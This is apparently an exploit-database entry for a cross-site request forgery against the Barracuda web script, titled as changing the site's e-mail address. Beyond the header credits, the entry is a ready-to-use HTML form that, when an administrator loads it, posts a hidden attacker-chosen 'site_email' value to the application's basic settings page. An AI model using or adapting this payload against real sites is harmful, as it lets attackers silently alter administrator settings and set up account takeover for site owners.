# Exploit Title: Barracuda CSRF (change e-mail address) # Author: Jonturk75 # Vendor or Software Link: http://www.scripts.com/viewscript/barracuda/19576/ # Category:: webapps # Demo : http://demo.boonex.com/administration/ # Greetz: Inj3ct0r Exploit DataBase 1337day.com <form id="adm-settings-form" name="adm-settings-form" action="target.com/[PATH]/administration/basic_settings.php" method="post" enctype="multipart/form-data" class="form_advanced"> <input type="hidden" value="mail@mail.com" name="site_email" class="form_input_text"/> <input type="submit" value="Save" name="save" class="form_input_submit"/>